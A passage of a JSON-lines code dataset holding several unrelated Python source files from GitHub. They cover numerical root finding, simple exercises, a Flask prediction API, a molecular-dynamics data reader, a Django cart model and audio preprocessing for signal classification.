= float(x1)\n e = float(e)\n\n if f(f_x, x0) * f(f_x, x1) > 0.0:\n print(\"Given guess values do not bracket the root.\")\n print(\"Try Again with different guess values.\")\n else:\n falsePosition(f_x, x0, x1, e)\n\nif __name__ == '__main__':\n main()\n","repo_name":"saltmurai/numerical-method","sub_path":"regula_falsi.py","file_name":"regula_falsi.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36375028729","text":"# File : PR13A_2272028.py\r\n# Penulis : Nathaniel Valentino Robert\r\n# Deskripsi\r\n# Buatlah program yang akan menerima masukan N\r\n# buah bilangan lalu akan menampilkan N bilangan\r\n# tersebut secara terurut menurun. 
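regula_falsi.py leans on sympy for the derivative bounds, but the false-position update itself needs no symbolic machinery. A dependency-free sketch with the same bracketing check and the stopping rule |f(x2)| <= tol, using the file's polynomial as the example:

```python
def false_position(f, x0, x1, tol=1e-5, max_iter=200):
    """Root of f in [x0, x1] via the false-position update
    x2 = x0 - (x1 - x0) * f(x0) / (f(x1) - f(x0))."""
    if f(x0) * f(x1) > 0:
        raise ValueError("guesses do not bracket a root")
    x2 = x0
    for _ in range(max_iter):
        x2 = x0 - (x1 - x0) * f(x0) / (f(x1) - f(x0))
        if abs(f(x2)) <= tol:
            break
        if f(x0) * f(x2) < 0:      # root lies in [x0, x2]
            x1 = x2
        else:                      # root lies in [x2, x1]
            x0 = x2
    return x2

root = false_position(lambda x: 1.2 * x**5 - 2.57 * x + 2, -2.0, -1.0)
```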
\r\n# Kamus Data\r\n# N = var input panjang array\r\n# Arr = var deklarasi array kosong sepanjang N\r\n# num = var agar print tidak didalam array\r\ndef main():\r\n N = int(input(\"N : \"))\r\n Arr = [0] * N\r\n\r\n for i in range(N):\r\n Arr[i] = int(input(\"Masukkan bilangan ke-{}: \".format(i+1)))\r\n\r\n # Mengurutkan bilangan secara menurun\r\n for i in range(N):\r\n for j in range(i+1, N):\r\n if Arr[i] > Arr[j]:\r\n Arr[i], Arr[j] = Arr[j], Arr[i]\r\n\r\n print(\"Bilangan terurut menurun:\")\r\n for num in Arr:\r\n print(num, end=\" \")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"nathaniel-valen/daspro","sub_path":"Pertemuan 14/PR13A_2722028.py","file_name":"PR13A_2722028.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70961272804","text":"def add_time(start, duration, day=None):\n MORNING = \"AM\"\n NIGHT = \"PM\"\n new_time = \"\"\n\n\n # Days of the week for evaluating\n week_map = {'Monday': 1, 'Tuesday': 2, 'Wednesday': 3, 'Thursday': 4, 'Friday': 5, 'Saturday': 6,\n 'Sunday': 7}\n\n\n # Split intial time\n start_hours = int(start.split()[0].split(\":\")[0])\n start_minutes = int(start.split()[0].split(\":\")[1])\n start_midday = start.split()[1].upper()\n\n # Split time to add\n duration_hours = int(duration.split(\":\")[0])\n duration_minutes = int(duration.split(\":\")[1])\n\n # Add times\n total_hours = start_hours + duration_hours\n total_minutes = start_minutes + duration_minutes\n\n # Add 12 hours for 24 hr time\n if start_midday == NIGHT:\n total_hours += 12\n\n # Add minutes to new hours and set remaining minutes to total_minutes\n if total_minutes >= 60:\n total_hours += total_minutes // 60\n total_minutes = total_minutes % 60\n\n\n\n # Declarations\n # ---------------------------------------------------------------\n # Days later\n total_days = total_hours // 24\n\n # Day of the week to print\n result_day = None\n\n # Result hours to print\n result_hours = (total_hours % 24) % 12\n\n # Result minutes to print\n result_minutes = None\n\n # Result midday to print\n result_midday = MORNING if (total_hours % 24) < 12 else NIGHT\n # ---------------------------------------------------------------\n\n\n\n #Deal with midnight/noon\n if result_hours == 0:\n result_hours = '12'\n result_hours = str(result_hours)\n\n #Format minutes if 10s placeholder is 0\n if total_minutes < 10:\n result_minutes = f\":0{total_minutes}\"\n else:\n result_minutes = f\":{total_minutes}\"\n\n\n # Base return\n new_time = f\"{result_hours}{result_minutes} {result_midday}\"\n\n\n if day == None:\n if total_days == 1:\n return new_time + \" (next day)\"\n if total_days == 0:\n return new_time\n return f\"{new_time} ({total_days} days later)\"\n else:\n day_value = (week_map[day.lower().capitalize()] + total_days) % 7\n for day_key, day_v in week_map.items():\n if day_v == day_value:\n day_value = day_key\n\n if total_days == 0:\n return f\"{new_time}, {day_value}\"\n elif total_days == 1:\n return f\"{new_time}, {day_value} (next day)\"\n else:\n return f\"{new_time}, {day_value} ({total_days} days later)\"\n\n","repo_name":"fhut/Portfolio","sub_path":"TimeFormatter/TimeFormat.py","file_name":"TimeFormat.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70595705444","text":"import pickle\nfrom flask import Flask, request, jsonify, render_template\nimport numpy as 
np\nimport jsonpickle\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n# Load the saved model from the pickle file\nwith open('wine_pca_model.pkl', 'rb') as f:\n model = pickle.load(f)\nwith open('standard_scaler.pkl', 'rb') as f:\n sc = pickle.load(f)\nwith open('pca.pkl', 'rb') as f:\n pca = pickle.load(f)\n\n@app.route('/api/test', methods=['GET'])\ndef test():\n # Model code\n response = {'message': 'API hit iimv'}\n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n# Define the home page that displays the HTML form\n@app.route('/api/home')\ndef home():\n return render_template('index.html')\n\n# Define the API endpoint for making predictions\n@app.route('/api/predict', methods=['POST'])\ndef predict():\n # Get the input features from the form data\n feature1 = request.form['feature1']\n feature2 = request.form['feature2']\n feature3 = request.form['feature3']\n feature4 = request.form['feature4']\n feature5 = request.form['feature5']\n feature6 = request.form['feature6']\n feature7 = request.form['feature7']\n feature8 = request.form['feature8']\n feature9 = request.form['feature9']\n feature10 = request.form['feature10']\n feature11 = request.form['feature11']\n feature12 = request.form['feature12']\n feature13 = request.form['feature13']\n # repeat for all 13 features\n input_features = {\n 'Feature 1': feature1,\n 'Feature 2': feature2,\n 'Feature 3': feature3,\n 'Feature 4': feature4,\n 'Feature 5': feature5,\n 'Feature 6': feature6,\n 'Feature 7': feature7,\n 'Feature 8': feature8,\n 'Feature 9': feature9,\n 'Feature 10': feature10,\n 'Feature 11': feature11,\n 'Feature 12': feature12,\n 'Feature 13': feature13\n }\n \n # Pack the input features into a NumPy array (form values are strings, so cast to float)\n X_test = np.array([feature1, feature2, feature3, feature4, feature5, feature6, feature7, feature8, feature9, feature10, feature11, feature12, feature13], dtype=float)\n\n # Transform the input data using the same StandardScaler and PCA objects\n X_test = sc.transform(X_test.reshape(1,-1))\n X_test = pca.transform(X_test)\n \n \n # Make the prediction using the trained model\n y_pred = model.predict(X_test)\n \n # Return the predicted label to the HTML page\n return render_template('index.html', prediction_text='Customer segment: {}'.format(y_pred),input_features=input_features)\n\n# Run the Flask application\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"Harshavarthanan/wine_prediction","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"34148168714","text":"import os,sys\nimport numpy as np\nfrom .scf import ry2ev, kbar2evperang3, get_block, get_geometry_in, get_cell, get_coords\n\n# Read in geometries from an ABACUS MD trajectory.\n# The atomic coordinates are read in from generated files in OUT.XXXX.\n# Energies, forces and stresses are read from the running_md.log output.\n# IMPORTANT: the program by default takes the STRU input file as the standard cell information,\n# therefore the direct and Cartesian coordinates read in could differ from the ones in \n# the output cif files!\n# It is highly recommended to use ORTHOGONAL coordinates in the STRU file if you wish to get\n# the same coordinates in both dpdata and the output cif files. 
\n\ndef get_path_out(fname, inlines):\n # This function is different from the same-name function in scf.py.\n # This function returns OUT.XXXX's base directory.\n path_out = os.path.join(fname, \"OUT.ABACUS/\")\n for line in inlines:\n if len(line)>0 and \"suffix\" in line and \"suffix\"==line.split()[0]:\n suffix = line.split()[1]\n path_out = os.path.join(fname, \"OUT.%s/\" % suffix)\n break\n return path_out\n\ndef get_coord_dump_freq(inlines):\n for line in inlines:\n if len(line)>0 and \"md_dumpmdfred\" in line and \"md_dumpmdfred\" == line.split()[0]:\n return int(line.split()[1])\n return 1\n\n# set up a cell according to cell info in cif file.\n# maybe useful later\n'''\ndef setup_cell(a, b, c, alpha, beta, gamma):\n cell = np.zeros(3, 3)\n cell[0, 0] = a\n cell[1, 0] = b*np.cos(gamma/180*np.pi)\n cell[1, 1] = b*np.sin(gamma/180*np.pi)\n cell[2, 0] = c*np.cos(beta/180*np.pi)\n cell[2, 1] = c*(b*np.cos(alpha/180*np.pi) - cell[1, 0]*np.cos(beta/180*np.pi))/cell[1, 1]\n cell[2, 2] = np.sqrt(c**2 - cell[2, 0]**2 - cell[2, 1]**2)\n return cell\n'''\n\ndef get_single_coord_from_cif(pos_file, atom_names, natoms, cell):\n assert(len(atom_names) == len(natoms))\n nele = len(atom_names)\n total_natoms = sum(natoms)\n coord = np.zeros([total_natoms, 3])\n a = 0\n b = 0\n c = 0\n alpha = 0\n beta = 0\n gamma = 0\n with open(pos_file, \"r\") as fp:\n lines = fp.read().split(\"\\n\")\n for line in lines:\n if \"_cell_length_a\" in line:\n a = float(line.split()[1])\n if \"_cell_length_b\" in line:\n b = float(line.split()[1])\n if \"_cell_length_c\" in line:\n c = float(line.split()[1]) \n if \"_cell_angle_alpha\" in line:\n alpha = float(line.split()[1])\n if \"_cell_angle_beta\" in line:\n beta = float(line.split()[1])\n if \"_cell_angle_gamma\" in line:\n gamma = float(line.split()[1])\n assert(a > 0 and b > 0 and c > 0 and alpha > 0 and beta > 0 and gamma > 0)\n #cell = setup_cell(a, b, c, alpha, beta, gamma)\n coord_lines = get_block(lines=lines, keyword=\"_atom_site_fract_z\", skip=0, nlines = total_natoms)\n \n ia_idx = 0\n for it in range(nele):\n for ia in range(natoms[it]):\n coord_line = coord_lines[ia_idx].split()\n assert(coord_line[0] == atom_names[it])\n coord[ia_idx, 0] = float(coord_line[1])\n coord[ia_idx, 1] = float(coord_line[2])\n coord[ia_idx, 2] = float(coord_line[3])\n ia_idx+=1\n coord = np.matmul(coord, cell)\n # important! Coordinates are converted to Cartesian coordinate.\n return coord\n \n \ndef get_coords_from_cif(ndump, dump_freq, atom_names, natoms, types, path_out, cell):\n total_natoms = sum(natoms)\n #cell = np.zeros(ndump, 3, 3)\n coords = np.zeros([ndump, total_natoms, 3])\n pos_file = os.path.join(path_out, \"STRU_READIN_ADJUST.cif\")\n # frame 0 file is different from any other frames\n coords[0] = get_single_coord_from_cif(pos_file, atom_names, natoms, cell)\n for dump_idx in range(1, ndump):\n pos_file = os.path.join(path_out, \"md_pos_%d.cif\" %(dump_idx*dump_freq))\n #print(\"dump_idx = %s\" %dump_idx)\n coords[dump_idx] = get_single_coord_from_cif(pos_file, atom_names, natoms, cell)\n return coords\n\ndef get_energy_force_stress(outlines, inlines, dump_freq, ndump, natoms, atom_names):\n stress = None\n total_natoms = sum(natoms)\n for line in inlines:\n if len(line)>0 and \"stress\" in line and \"stress\" == line.split()[0] and \"1\" == line.split()[1]:\n stress = np.zeros([ndump, 3, 3])\n break\n if type(stress) != np.ndarray:\n print(\"The ABACUS program has no stress output. 
Stress will not be read.\")\n nenergy = 0\n nforce = 0\n nstress = 0\n energy = np.zeros(ndump)\n force = np.zeros([ndump, total_natoms, 3])\n\n for line_idx, line in enumerate(outlines):\n if \"final etot is\" in line:\n if nenergy%dump_freq == 0:\n energy[int(nenergy/dump_freq)] = float(line.split()[-2])\n nenergy+=1\n if \"TOTAL-FORCE (eV/Angstrom)\" in line:\n for iatom in range(0, total_natoms):\n force_line = outlines[line_idx+5+iatom]\n atom_force = [float(i) for i in force_line.split()[1:]]\n assert(len(atom_force) == 3)\n atom_force = np.array(atom_force)\n if nforce%dump_freq == 0:\n force[int(nforce/dump_freq), iatom] = atom_force\n nforce+=1\n assert(nforce==nenergy)\n if \"TOTAL-STRESS (KBAR)\" in line:\n for idx in range(0, 3):\n stress_line = outlines[line_idx+4+idx]\n single_stress = [float(i) for i in stress_line.split()]\n if len(single_stress) != 3:\n print(single_stress)\n assert(len(single_stress) == 3)\n single_stress = np.array(single_stress)\n if nstress%dump_freq == 0:\n stress[int(nstress/dump_freq), idx] = single_stress\n nstress+=1\n assert(nstress==nforce)\n if type(stress) == np.ndarray:\n stress *= kbar2evperang3\n return energy, force, stress\n\n\ndef get_frame (fname):\n if type(fname) == str:\n # if the input parameter is only one string, it is assumed that it is the \n # base directory containing INPUT file;\n path_in = os.path.join(fname, \"INPUT\")\n else:\n raise RuntimeError('invalid input') \n with open(path_in, 'r') as fp:\n inlines = fp.read().split('\\n')\n geometry_path_in = get_geometry_in(fname, inlines) # base dir of STRU\n path_out = get_path_out(fname, inlines) \n\n with open(geometry_path_in, 'r') as fp:\n geometry_inlines = fp.read().split('\\n')\n celldm, cell = get_cell(geometry_inlines) \n atom_names, natoms, types, coords = get_coords(celldm, cell, geometry_inlines, inlines) \n # This coords is not to be used.\n dump_freq = get_coord_dump_freq(inlines = inlines)\n ndump = int(os.popen(\"ls -l %s | grep 'md_pos_' | wc -l\" %path_out).readlines()[0])\n # number of dumped geometry files\n coords = get_coords_from_cif(ndump, dump_freq, atom_names, natoms, types, path_out, cell)\n \n # TODO: Read in energies, forces and pressures.\n with open(os.path.join(path_out, \"running_md.log\"), 'r') as fp:\n outlines = fp.read().split('\\n')\n energy, force, stress = get_energy_force_stress(outlines, inlines, dump_freq, ndump, natoms, atom_names)\n if type(stress) == np.ndarray:\n stress *= np.linalg.det(cell)\n data = {}\n data['atom_names'] = atom_names\n data['atom_numbs'] = natoms\n data['atom_types'] = types\n data['cells'] = np.zeros([ndump, 3, 3])\n for idx in range(ndump):\n data['cells'][:, :, :] = cell\n data['coords'] = coords\n data['energies'] = energy\n data['forces'] = force\n data['virials'] = stress\n if type(data['virials']) != np.ndarray:\n del data['virials']\n data['orig'] = np.zeros(3)\n\n return data\n","repo_name":"Vibsteamer/dpdata","sub_path":"dpdata/abacus/md.py","file_name":"md.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"29320500856","text":"import math, random\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init, functional\nfrom torch.utils.data import DataLoader, Dataset, random_split\n\nimport torchaudio\nfrom torchaudio import transforms\n\nfrom scipy.signal import filtfilt\nfrom scipy import stats\nimport scipy\n\nimport io\n\n\n#To allow plotting pytorch tensors\ntorch.Tensor.ndim = property(lambda 
self: len(self.shape))\n#use gpu if available\ndevice = torch.device(\"cpu\")\n\nSEED = 0\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\n\nMAX_AUDIO_LENGTH = 10000\nSAMPLING_RATE = 2000\nN_CHANNELS = 1\nSHIFT_PCT = 0.2\nFREQ_SHIFT_PCT = 1\n\nLOW_FREQ = 15\nHIGH_FREQ = 400\nORDER = 3\n\nSPEC_HOP_LENGTH=64\nSPEC_N_FFT=256 # standard number\nSPEC_N_MELS=128 \n\nMFCC_HOP_LENGTH=64\nMFCC_N_FFT=256 # standard number\nMFCC_N_MELS=64 \nN_MFCC=14 # standard number\n\nclass AudioUtil():\n @staticmethod\n def open(audio_file):\n\n #Open an audio file\n # print(f\"Opening file : {audio_file}\")\n sig, sr = torchaudio.load(audio_file)\n sig.to(device)\n return (sig, sr)\n\n @staticmethod\n def rechannel(aud, new_channel):\n\n #Convert the audio from mono to stereo or vice versa\n\n sig, sr = aud\n\n if(sig.shape[0] == new_channel):\n return aud\n \n # print('Rechanneling to ' + str(new_channel))\n if(new_channel == 1):\n resig = sig[:1, :]\n else:\n resig = torch.cat([sig, sig])\n \n return ((resig, sr))\n\n @staticmethod\n def resample(aud, newsr):\n\n #Resample the audio to the newsr frequency\n\n sig, sr = aud\n \n if(sr == newsr):\n return((sig, sr))\n \n # print('Resampling to ' + str(newsr))\n\n num_channels = sig.shape[0]\n resig_fn = torchaudio.transforms.Resample(sr, newsr).to(device)\n resig = resig_fn(sig[:1, :].to(device))\n if(num_channels > 1):\n retwo_fn = torchaudio.transforms.Resample(sr, newsr).to(device)\n retwo = retwo_fn(sig[1:, :].to(device))\n resig = torch.cat([resig, retwo])\n\n return((resig, newsr))\n\n @staticmethod\n def butterworth_filter(aud, low_cutoff_freq=15, high_cutoff_freq=900, order=3):\n sig, sr = aud\n\n nyq = 0.5 * sr\n low = low_cutoff_freq / nyq\n high = high_cutoff_freq / nyq\n \n b, a = scipy.signal.butter(order, [low, high], 'bandpass', analog=False)\n filtered_sig = scipy.signal.filtfilt(b, a, sig.cpu(), axis=1)\n filtered_sig = torch.Tensor(filtered_sig.copy()).to(device)\n \n return ((filtered_sig, sr))\n\n @staticmethod\n def pad_trunc(aud, max_len):\n #add padding, or truncate the signal to fit the max length\n sig, sr = aud\n num_rows, sig_len = sig.shape\n\n if(sig_len > max_len):\n #Truncate the signal\n # print('Truncating signal to ' + str(max_ms) + ' ms')\n sig = sig[:, :max_len]\n elif(sig_len < max_len):\n #Add padding\n # print('Padding signal to ' + str(max_ms) + ' ms')\n pad_begin_len = random.randint(0, max_len - sig_len)\n pad_end_len = max_len - sig_len - pad_begin_len\n\n pad_begin = torch.zeros((num_rows, pad_begin_len)).to(device)\n pad_end = torch.zeros((num_rows, pad_end_len)).to(device)\n\n sig = torch.cat((pad_begin, sig, pad_end), 1)\n \n return ((sig, sr))\n\n @staticmethod\n def time_shift(aud, shift_limit):\n sig, sr = aud\n _, sig_len = sig.shape\n shift_amt = int(random.random() * shift_limit * sig_len)\n return (sig.roll(shift_amt), sr)\n\n @staticmethod\n def pitch_shift(aud, shift_limit):\n sig, sr = aud\n shift_amt = random.random() * shift_limit\n return (sig * shift_amt, sr)\n\n @staticmethod\n def get_mel_spectrogram(aud, hop_length=512, n_fft=1024, n_mels=64):\n sig, sr = aud\n top_db = 80\n\n mel_transformation = torchaudio.transforms.MelSpectrogram(sample_rate=sr, n_fft=n_fft, hop_length=hop_length, n_mels=n_mels)\n db_transformation = torchaudio.transforms.AmplitudeToDB(top_db=top_db)\n mel_transformation.to(device)\n db_transformation.to(device)\n spec = mel_transformation(sig.to(device))\n spec = db_transformation(spec.to(device))\n return spec\n\n @staticmethod\n def spectro_augment(spec, max_mask_pct = 
0.1, n_freq_masks = 1, n_time_masks=1):\n _, n_mels, n_steps = spec.shape\n mask_value = spec.mean()\n aug_spec = spec\n\n freq_max_param = max_mask_pct * n_mels\n for _ in range(n_freq_masks):\n aug_spec = transforms.FrequencyMasking(freq_max_param).to(device)(aug_spec, mask_value)\n time_mask_params = max_mask_pct * n_steps\n for _ in range(n_time_masks):\n aug_spec = transforms.TimeMasking(time_mask_params).to(device)(aug_spec, mask_value)\n\n return aug_spec\n\n @staticmethod\n def get_MFCC(aud, hop_length=512, n_fft=1024, n_mels=64, n_mfcc = 64):\n sig, sr = aud\n mfcc_fn = transforms.MFCC( sample_rate=sr,\n n_mfcc=n_mfcc,\n melkwargs={\"n_fft\": n_fft, \"n_mels\": n_mels, \"hop_length\": hop_length})\n mfcc_fn.to(device)\n return mfcc_fn(sig.to(device))\n \n @staticmethod\n def get_DeltaMFCC(mfcc):\n delta_fn = torchaudio.transforms.ComputeDeltas().to(device)\n delta_mfcc = delta_fn(mfcc)\n delta2_mfcc = delta_fn(delta_mfcc)\n\n return (delta_mfcc, delta2_mfcc)\n \n @staticmethod\n def getWindows(aud, window_len=5000, overlap=0.1, test=False, mfcc=False, delta=False):\n sig, sr = aud\n sig_len = len(sig[0])\n result = []\n if(sig_len <= window_len):\n w_aud = AudioUtil.pad_trunc(aud, window_len)\n w_aud = AudioUtil.pitch_shift(w_aud, SHIFT_PCT)\n if mfcc:\n w_spec = AudioUtil.get_MFCC(w_aud, MFCC_HOP_LENGTH, MFCC_N_FFT, MFCC_N_MELS, n_mfcc=N_MFCC)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n else:\n w_spec = AudioUtil.get_mel_spectrogram(w_aud, hop_length=SPEC_HOP_LENGTH, n_fft=SPEC_N_FFT, n_mels=SPEC_N_MELS)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n if not test:\n w_spec = AudioUtil.spectro_augment(w_spec, n_freq_masks=1, n_time_masks=2)\n result.append(w_spec)\n else:\n start = 0\n end = window_len\n while end <= sig_len:\n w = sig[0][start:end]\n w_aud = (w.unsqueeze(dim=0), sr)\n w_aud = AudioUtil.pitch_shift(w_aud, SHIFT_PCT)\n if mfcc:\n w_spec = AudioUtil.get_MFCC(w_aud, MFCC_HOP_LENGTH, MFCC_N_FFT, MFCC_N_MELS, n_mfcc=N_MFCC)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n else:\n w_spec = AudioUtil.get_mel_spectrogram(w_aud, hop_length=SPEC_HOP_LENGTH, n_fft=SPEC_N_FFT, n_mels=SPEC_N_MELS)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n if not test:\n w_spec = AudioUtil.spectro_augment(w_spec, n_freq_masks=1, n_time_masks=2)\n result.append(w_spec)\n\n start = int(end - overlap * window_len)\n end = int(start + window_len)\n return result\n\n @staticmethod\n def preprocess_audio_windowed(audio_dir, test=False, mfcc=False, delta=False):\n aud = AudioUtil.open(audio_dir)\n aud = AudioUtil.rechannel(aud, N_CHANNELS)\n aud = AudioUtil.resample(aud, SAMPLING_RATE)\n aud = AudioUtil.butterworth_filter(aud, LOW_FREQ, HIGH_FREQ, ORDER)\n result = AudioUtil.getWindows(aud, MAX_AUDIO_LENGTH, overlap=0.1, test=test, mfcc=mfcc, delta=delta)\n return result\n\n @staticmethod\n def preprocess_audio_only(audio_dir):\n aud = AudioUtil.open(audio_dir)\n aud = AudioUtil.rechannel(aud, N_CHANNELS)\n aud = AudioUtil.resample(aud, SAMPLING_RATE)\n aud = AudioUtil.pad_trunc(aud, MAX_AUDIO_LENGTH)\n aud = AudioUtil.time_shift(aud, SHIFT_PCT)\n aud = AudioUtil.pitch_shift(aud, FREQ_SHIFT_PCT)\n sig, sr = aud\n return sig\n @staticmethod\n def preprocess_audio(audio_dir):\n aud = 
AudioUtil.open(audio_dir)\n aud = AudioUtil.rechannel(aud, N_CHANNELS)\n aud = AudioUtil.resample(aud, SAMPLING_RATE)\n aud = AudioUtil.butterworth_filter(aud, LOW_FREQ, HIGH_FREQ, ORDER)\n aud = AudioUtil.pad_trunc(aud, MAX_AUDIO_LENGTH)\n sig, sr = aud\n print(sig.shape)\n aud = AudioUtil.time_shift(aud, SHIFT_PCT)\n aud = AudioUtil.pitch_shift(aud, SHIFT_PCT)\n \n spec = AudioUtil.get_mel_spectrogram(aud, hop_length=SPEC_HOP_LENGTH, n_fft=SPEC_N_FFT, n_mels=SPEC_N_MELS)\n aug_spec = AudioUtil.spectro_augment(spec, n_freq_masks=2, n_time_masks=2)\n mfcc = AudioUtil.get_MFCC(aud, hop_length=MFCC_HOP_LENGTH, n_fft=MFCC_N_FFT, n_mels=MFCC_N_MELS, n_mfcc=N_MFCC)\n mfcc_1, mfcc_2 = AudioUtil.get_DeltaMFCC(mfcc)\n return (aud, spec, aug_spec, mfcc, mfcc_1, mfcc_2)\n \n\ndef getPreprocessedData(audio_bytes, mfcc=True):\n audio = io.BytesIO(audio_bytes)\n result = AudioUtil.preprocess_audio_windowed(audio, mfcc=mfcc, delta=True, test=True)\n return result\n","repo_name":"iTzAymen/pcg-api","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":9901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"10116372969","text":"\"\"\"\nThis is a django-split-settings main file.\nFor more information read this:\nhttps://github.com/sobolevn/django-split-settings\nDefault environment is `development`.\nTo change settings file:\n`DJANGO_ENV=production python manage.py runserver`\n\"\"\"\nfrom split_settings.tools import include\n\nfrom env import env\n\nbase_settings = [\n 'components/*.py',\n\n # Select the right env:\n 'environments/%s.py' % env('PAYSYS_DJANGO_ENV'),\n]\n\n# Include settings:\ninclude(*base_settings)\n","repo_name":"dbykov/payment-system","sub_path":"project/project/settings/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"35756468608","text":"# Problem - lv 2 \n'''\n# #1-230206 failed\n# Reason it failed: the shortest string is not the only candidate prefix\n'''\nimport collections\ndef solution(phone_book):\n \n test = collections.Counter(phone_book)\n \n # 1. Sort the elements by length\n phone_book.sort(key=len)\n \n # 2. Slice each element down to the length of the shortest string and store it as a dictionary key \n dict = {}\n min_len = len(phone_book[0])\n for p in phone_book:\n p_key = p[:min_len]\n \n if not p_key in dict.keys():\n dict[p_key] = 1\n else :\n return False\n \n return True","repo_name":"HyeM207/Algorithm","sub_path":"Programmers/Lv_2/[Prg] 전화번호 목록.py","file_name":"[Prg] 전화번호 목록.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"24638953979","text":"from decimal import Decimal\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models import Sum\nfrom django.db.models.signals import pre_save, m2m_changed\n\nfrom products.models import Product\n\n\nUser = settings.AUTH_USER_MODEL\n\n\nclass CartManager(models.Manager):\n\n def get_or_new(self, request): # get existing cart else create new\n cart_id = request.session.get('cart_id', None)\n qs = self.get_queryset().filter(id=cart_id)\n if qs.count() == 1:\n new_obj = False\n cart_obj = qs.first()\n if request.user.is_authenticated() and cart_obj.user is None:\n cart_obj.user = request.user\n cart_obj.save()\n else: # This block will be executed when no such id exists or the id contains non-numeric characters\n cart_obj = Cart.objects.new(user=request.user)\n new_obj = True\n request.session['cart_id'] = cart_obj.id\n return cart_obj, new_obj\n\n def new(self, user=None):\n user_obj = None\n if user is not None and user.is_authenticated():\n user_obj = user\n return self.model.objects.create(user=user_obj)\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(User, null=True, blank=True) # Non-logged in user can also create a cart\n products = models.ManyToManyField(Product, blank=True) # Cart can be blank\n subtotal = models.DecimalField(default=0.00, max_digits=100, decimal_places=2) # stores the total of cart\n total = models.DecimalField(default=0.00, max_digits=100, decimal_places=2) # stores the final price\n updated = models.DateTimeField(auto_now=True) # Last updated time\n timestamp = models.DateTimeField(auto_now_add=True) # Created time\n\n objects = CartManager()\n\n def __str__(self):\n return str(self.id)\n\n @property\n def has_tax(self):\n if self.subtotal != self.total:\n return True\n return False\n\n @property\n def is_digital(self):\n qs = self.products.filter(is_digital=False)\n if qs.exists():\n return False\n return True\n\n def get_tax(self):\n if self.has_tax:\n return self.total - self.subtotal\n return None\n\n def non_digital_products_total(self):\n qs = self.products.filter(is_digital=False)\n if qs.exists():\n total = qs.aggregate(Sum('price'))\n return total.get('price__sum')\n return 0\n\n\ndef m2m_changed_cart_receiver(sender, instance, action, *args, **kwargs):\n # The following if block avoids calculations during pre actions\n if action == 'post_remove' or action == 'post_add' or action == 'post_clear':\n products = instance.products.all()\n total = 0\n for product in products:\n total += product.price\n if instance.subtotal != total:\n instance.subtotal = total\n instance.save() # Since it is not a pre_save receiver, .save() is required\n\nm2m_changed.connect(m2m_changed_cart_receiver, sender=Cart.products.through)\n\n\n# This is used to include/deduct amount from subtotal like shipping charges, discounts etc.\ndef pre_save_cart_receiver(sender, instance, *args, **kwargs):\n if instance.subtotal > 0:\n instance.total = instance.subtotal\n # instance.total = Decimal(instance.subtotal) * Decimal(1.08) # 8% tax\n # OR --> 
instance.total = float(instance.subtotal) * float(1.08)\n else:\n instance.total = 0.00\n\npre_save.connect(pre_save_cart_receiver, sender=Cart)\n","repo_name":"shan18/Kart","sub_path":"src/carts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"}
+{"seq_id":"39131396234","text":"#!/usr/bin/env python3\n\n__day__ = 4\n\n__year__ = 2021\n\n__motd__ = '--- Year %s -- Day %s ---' % (__year__, __day__)\n\n__url__ = 'http://adventofcode.com/%s/day/%s' % (__year__, __day__)\n\nverbose = 0\n\n\nclass Field:\n\n    def __init__(self, val):\n        self.val = int(val)\n        self.mark = False\n\n    def set_mark(self):\n        if self.is_marked(): return\n        self.mark = True\n\n    def is_marked(self):\n        return self.mark\n\n    def get_val(self):\n        return self.val\n\n    def visual(self):\n        format = '[%3d]' if self.is_marked() else ' %3d '\n        return format % self.get_val()\n\n\nclass Board:\n\n    def __init__(self, idx, size=5):\n        self.size = size\n        self.idx = idx\n        self.data = []\n\n    def print(self):\n        print('=== board idx: ===',self.idx,'=== winning:',self.is_winning(),'===')\n        for row in self.data:\n            print(' '.join([f.visual() for f in row]))\n        print()\n\n    def add_row(self, row: list):\n        assert len(row) == self.size, 'ERROR - row length %d does not match size %d !' % (len(row), self.size)\n        self.data.append([Field(f) for f in row])\n\n    def draw(self, num: int):\n        for row in self.data:\n            for f in row:\n                if 